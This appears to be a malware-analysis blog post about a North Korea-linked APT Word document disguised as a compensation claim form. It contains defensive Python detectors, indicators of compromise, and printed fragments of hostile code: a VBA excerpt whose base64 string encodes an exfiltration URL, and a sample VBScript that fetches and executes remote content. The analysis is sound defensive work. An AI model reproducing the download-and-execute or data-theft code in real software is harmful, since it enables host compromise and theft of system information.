Attacker Distributing Malicious Word Document Written as Compensation Claim Form

A malicious Word document disguised as a ‘compensation claim form’ is being distributed again, in what is presumed to be a targeted APT attack. Malware using the identical document format was also discovered in March, and the ASEC team published an analysis of it on the ASEC blog. The newly discovered document was created recently and carries the same content as the earlier one, but its execution method differs. This post explains the features and characteristics of the new ‘compensation claim form’ document, together with related files strongly suspected of having been made by the same attacker (developer).

  • Filename: Compensation Claim (form).doc
  • SHA256: 811b42bb169f02d1b0b3527e2ca6c00630bebd676b235cd4e391e9e595f9dfa8
  • Original Author: Network Group
  • Last Modified By: Naeil_EnglishStart
  • Document Creation Date: March 2nd, 2021 9:01:00 A.M.
  • Last Modified At: June 7th, 2021 02:23:00Z

The Original Author and Last Modified By values match those of the ‘compensation claim form’ document discovered in March. The attacker apparently edited the decoy document from the earlier attack and reused it in the current one.

The document's malicious behaviour is implemented in VBA. The VBA project part is stored under an .html file name to evade anti-malware detection; because Word binds the macro project through the relationship Type rather than the file extension, the renaming does not affect execution. The March sample instead used template injection: it referenced an external URL from which the VBA code, stored as a .yml file, was fetched.

<Relationship Id="rId1" Type="http://schemas.microsoft.com/office/2006/relationships/vbaProject" Target="asdgfa.html"/>
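As an added example (not code from the original post or from AhnLab), the following Python checks an OOXML Word file for vbaProject relationships whose Target has been renamed away from the stock vbaProject.bin, as in the relationship line above. The docx skeleton it builds is constructed for the demonstration; only the relationship Type and Target attributes mirror the page.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

VBA_REL_TYPE = "http://schemas.microsoft.com/office/2006/relationships/vbaProject"
RELS_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
RELS_PART = "word/_rels/document.xml.rels"


def vba_project_relationships(doc_bytes):
    """Inspect an OOXML Word file (a zip) and report every relationship of
    type vbaProject.  Word locates the macro project by this Type, not by
    the Target's extension, so a Target other than 'vbaProject.bin' is a
    renaming trick worth flagging.
    Returns a list of (target, renamed, part_present) tuples."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(doc_bytes)) as z:
        names = set(z.namelist())
        if RELS_PART not in names:
            return findings
        root = ET.fromstring(z.read(RELS_PART))
        for rel in root.iter(RELS_NS + "Relationship"):
            if rel.get("Type") != VBA_REL_TYPE:
                continue
            target = rel.get("Target", "")
            renamed = target.lower() != "vbaproject.bin"
            # Relative targets in document.xml.rels resolve under word/
            present = ("word/" + target) in names
            findings.append((target, renamed, present))
    return findings


def build_sample(target):
    """Constructed minimal docx skeleton (not the real sample): only the
    relationship part and a dummy macro container named `target`."""
    rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
        '<Relationship Id="rId1" Type="%s" Target="%s"/>'
        '<Relationship Id="rId2" '
        'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" '
        'Target="styles.xml"/>'
        "</Relationships>"
    ) % (VBA_REL_TYPE, target)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr(RELS_PART, rels)
        z.writestr("word/document.xml", "<w:document/>")
        z.writestr("word/" + target, b"\xd0\xcf\x11\xe0dummy-ole-container")
    return buf.getvalue()


if __name__ == "__main__":
    for t in ("asdgfa.html", "vbaProject.bin"):
        for target, renamed, present in vba_project_relationships(build_sample(t)):
            print("%-15s renamed=%s present=%s" % (target, renamed, present))
```

A benign macro document yields one vbaProject relationship pointing at vbaProject.bin; any other Target name, or a vbaProject relationship in a file that claims to be a plain .docx, deserves a closer look at the referenced part.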

The VBA code is stomped (the compiled p-code is kept while the stored source is overwritten, so tools that only read the source see nothing useful), and the main malicious function runs only when text is typed into the document (Selection.TypeText). Merely opening the document does not trigger it. Once the VBA code runs, it carries out the following:

  1. Creates and runs a Visual Basic Script file named %AppData%\desktop.ini
  2. Creates a Visual Basic Script file named %AppData%\Microsoft\desktop.ini
  3. Creates an Internet Explorer (iexplore.exe) shortcut file in the Startup directory (persistence; automatic execution trigger)
  4. The Internet Explorer shortcut runs the %AppData%\Microsoft\desktop.ini file
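The four steps above leave specific host artefacts. As an added example (not code from the original post or from AhnLab), the following Python triage checks a user profile for them: desktop.ini files under %AppData% that hold VBScript rather than INI content, and Startup-folder shortcuts whose string data names iexplore.exe and desktop.ini. The directory tree it builds for the demo is constructed; the shortcut name, script body and argument layout are assumptions, not observed values.

```python
import os
import re
import tempfile

# VBScript object-creation / evaluation markers that never appear in a
# genuine desktop.ini (which holds only INI sections such as [.ShellClassInfo]).
SCRIPT_MARKERS = re.compile(rb"CreateObject\s*\(|WScript\.|\bExecute\b|MSXML2|ADODB\.Stream", re.I)
# Strings expected in the Startup shortcut described above.
LNK_NEEDLES = ("iexplore.exe", "desktop.ini")


def looks_like_script(data):
    """True if the bytes contain VBScript markers rather than INI content."""
    return bool(SCRIPT_MARKERS.search(data))


def lnk_string_hits(lnk_bytes, needles=LNK_NEEDLES):
    """Heuristic .lnk check: target path and arguments are stored as UTF-16LE
    strings, so decode at both byte alignments and search them."""
    text = ""
    for offset in (0, 1):
        text += lnk_bytes[offset:].decode("utf-16-le", errors="ignore").lower()
    return [n for n in needles if n in text]


def triage(appdata_root, startup_dir):
    """Look for the artefacts listed above: VBScript dropped as
    %AppData%\\desktop.ini and %AppData%\\Microsoft\\desktop.ini, plus a
    Startup-folder shortcut that points IE at the latter."""
    findings = []
    for rel in ("desktop.ini", os.path.join("Microsoft", "desktop.ini")):
        path = os.path.join(appdata_root, rel)
        if os.path.isfile(path):
            with open(path, "rb") as f:
                if looks_like_script(f.read(65536)):
                    findings.append(("script-in-desktop.ini", path))
    if os.path.isdir(startup_dir):
        for name in sorted(os.listdir(startup_dir)):
            if not name.lower().endswith(".lnk"):
                continue
            path = os.path.join(startup_dir, name)
            with open(path, "rb") as f:
                hits = lnk_string_hits(f.read())
            if hits:
                findings.append(("startup-lnk:" + ",".join(hits), path))
    return findings


def build_constructed_profile(root):
    """Constructed test tree (not real samples): two VBScript desktop.ini
    files and a fake .lnk whose UTF-16LE string data names iexplore.exe and
    the dropped script.  Only the string payload matters to the heuristic."""
    appdata = os.path.join(root, "AppData", "Roaming")
    startup = os.path.join(appdata, "Microsoft", "Windows", "Start Menu", "Programs", "Startup")
    os.makedirs(startup)
    vbs = (b'Set http = CreateObject("MSXML2.XMLHTTP")\r\n'
           b'http.Open "GET", url, False\r\n'
           b'Execute http.responseText\r\n')  # assumed body, mirrors the described behaviour
    for rel in ("desktop.ini", os.path.join("Microsoft", "desktop.ini")):
        with open(os.path.join(appdata, rel), "wb") as f:
            f.write(vbs)
    fake_lnk = b"L\x00\x00\x00" + b"\x00" * 72 + (
        "C:\\Program Files\\Internet Explorer\\iexplore.exe "
        "%AppData%\\Microsoft\\desktop.ini"
    ).encode("utf-16-le")
    with open(os.path.join(startup, "Internet Explorer.lnk"), "wb") as f:
        f.write(fake_lnk)
    return appdata, startup


def demo():
    """Build the constructed profile in a temp dir and return the finding kinds."""
    with tempfile.TemporaryDirectory() as tmp:
        appdata, startup = build_constructed_profile(tmp)
        return [kind for kind, _ in triage(appdata, startup)]


if __name__ == "__main__":
    for kind in demo():
        print(kind)
```

On a live host, pass the real paths (for example os.environ["APPDATA"] and the Startup folder beneath it). The .lnk check is a string-grep, not a full parser, so treat a hit as a lead to confirm rather than a verdict.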

The %AppData%\Microsoft\desktop.ini script that the VBA code ultimately launches connects to a specific blog post, reads the data embedded in it and executes it; the malicious payload is fetched from the web at run time rather than stored on disk. The payload has since been removed from the blog, but the team was able to analyse a copy that had been captured beforehand.

  • Attacker’s web page: hxxps://smyun0272[.]blogspot[.]com/2021/06/dootakim[.]html

The payload run from that data collects and leaks system information, apparently to profile the infected host. The attacker's server URL reuses the domain seen in the March ‘compensation claim form’ attack, under a different subdomain and path:

  • (Attack in March) hxxp://ftcpark59[.]getenjoyment[.]net/1703/v[.]php
  • (Attack in June) hxxp://alyssalove[.]getenjoyment[.]net/0423/v[.]php

The payload carries out the following:

  1. Collects the list of currently running service processes
  2. Collects OS information
  3. Collects .NET version information
  4. Collects Microsoft Office Excel version information
  5. Collects the list of recent files
  6. Collects the list of shortcuts pinned to the taskbar
  7. Sends the collected information to the attacker's server as request parameters

The current ‘compensation claim form’ document has one feature that helps attribute it. Its VBA project calls a function named ‘aaaaaaaaaaaa’ that is never defined, so that call cannot execute normally. The same ‘aaaaaaaaaaaa’ function appears, properly defined and called, in other malicious Word documents used for targeted attacks. The attacker most likely reused parts of the VBA macro code across these documents.

Function ujmlkl()
    On Error Resume Next
    If (qazwsx = 7) Then

        vfgbvcd = Application.Version          ' Office version
        uname = Application.UserName           ' Office user name
        os = System.OperatingSystem            ' OS name
        sv = System.Version                    ' OS version
        ' aaaaaaaaaaaa() is called but never defined in this document; its arguments base64-decode to the values in the trailing comments
        rdxvdw = edcrfv(aaaaaaaaaaaa("QzpcXFByb2dyYW0gRmlsZXNcXA"))                   ' C:\\Program Files\\
        ki87ujhy = edcrfv(aaaaaaaaaaaa("QzpcXFByb2dyYW0gRmlsZXMgKHg4NilcXA"))         ' C:\\Program Files (x86)\\
        recent = tgbyhn
        dfresxcvfd = aaaaaaaaaaaa("aHR0cDovLzIwMC4yMDAuMjAwLjIwMC90ZXN0L3YucGhw")     ' http://200.200.200.200/test/v.php
        who = "shp"
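The three encoded arguments in the excerpt above are plain, unpadded base64. As an added example (not code from the original post or from AhnLab), the following Python pulls base64-looking literals out of VBA source and decodes them; it generalises beyond the aaaaaaaaaaaa() calls to any quoted literal of the right shape, and restores the '=' padding the sample strips. The embedded VBA lines are the page's own excerpt.

```python
import base64
import binascii
import re

# Quoted literals made only of base64 alphabet characters, 16+ chars long,
# with or without trailing '=' padding (the sample's strings carry none).
B64_LITERAL = re.compile(r'"([A-Za-z0-9+/]{16,}={0,2})"')


def b64_decode_lenient(encoded):
    """Decode base64 whose '=' padding was stripped, as in the VBA above."""
    stripped = encoded.rstrip("=")
    padded = stripped + "=" * (-len(stripped) % 4)
    return base64.b64decode(padded, validate=True)


def decode_base64_literals(vba_source):
    """Return [(encoded, decoded_text)] for every literal that decodes to
    printable ASCII; binary-looking or malformed candidates are skipped."""
    results = []
    for enc in B64_LITERAL.findall(vba_source):
        try:
            text = b64_decode_lenient(enc).decode("ascii")
        except (binascii.Error, UnicodeDecodeError):
            continue
        if text.isprintable():
            results.append((enc, text))
    return results


# Lines taken from the VBA excerpt on this page.
VBA_EXCERPT = r'''
        rdxvdw = edcrfv(aaaaaaaaaaaa("QzpcXFByb2dyYW0gRmlsZXNcXA"))
        ki87ujhy = edcrfv(aaaaaaaaaaaa("QzpcXFByb2dyYW0gRmlsZXMgKHg4NilcXA"))
        recent = tgbyhn
        dfresxcvfd = aaaaaaaaaaaa("aHR0cDovLzIwMC4yMDAuMjAwLjIwMC90ZXN0L3YucGhw")
        who = "shp"
'''

if __name__ == "__main__":
    for enc, text in decode_base64_literals(VBA_EXCERPT):
        print("%-48s -> %s" % (enc, text))
```

The two paths decode with doubled backslashes, and the URL is a /test/v.php endpoint on a placeholder address, the same v.php naming as the attacker server URLs listed above; recovering such strings from the source (or from olevba output) is the quick way to spot reused infrastructure patterns across samples.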

The following malicious Word documents contain the aaaaaaaaaaaa function and a function that calls it. Their execution methods all differ, but all are recently confirmed APT targeted-attack malware. AhnLab assesses that the attacker (developer) is the same North Korea-linked attack group.

  • April 17th – Compensation Claim Form.doc
  • April 15th – [Questionnaire] 2021 Data-based Future Prospect Research_(Peace and Security).doc
  • April 15th – [Questionnaire] 2021 Data-based Future Prospect Research_(Peace and Security).doc
  • March 25th – Planned Questionnaire.doc

AhnLab’s anti-malware product, V3, detects the related targeted attack malicious word documents and automatically categorizes them.

[File Detection]

Downloader/DOC.Generic
Downloader/DOC.Agent

[IOC]

0821884168a644f3c27176a52763acc9
10b4773a35e693761089a4bddae588eb
49a04c85555b35f998b1787b325526e6
6a614ca002c5b3a4d7023faffc0546e1
95c92bcfc39ceafc1735f190a575c60c

hxxps://smyun0272[.]blogspot[.]com/2021/06/dootakim[.]html
hxxp://alyssalove[.]getenjoyment[.]net/0423/v[.]php

For the entire code and more detailed explanation of features, check ATIP, ‘the next-generation threat intelligence platform.’
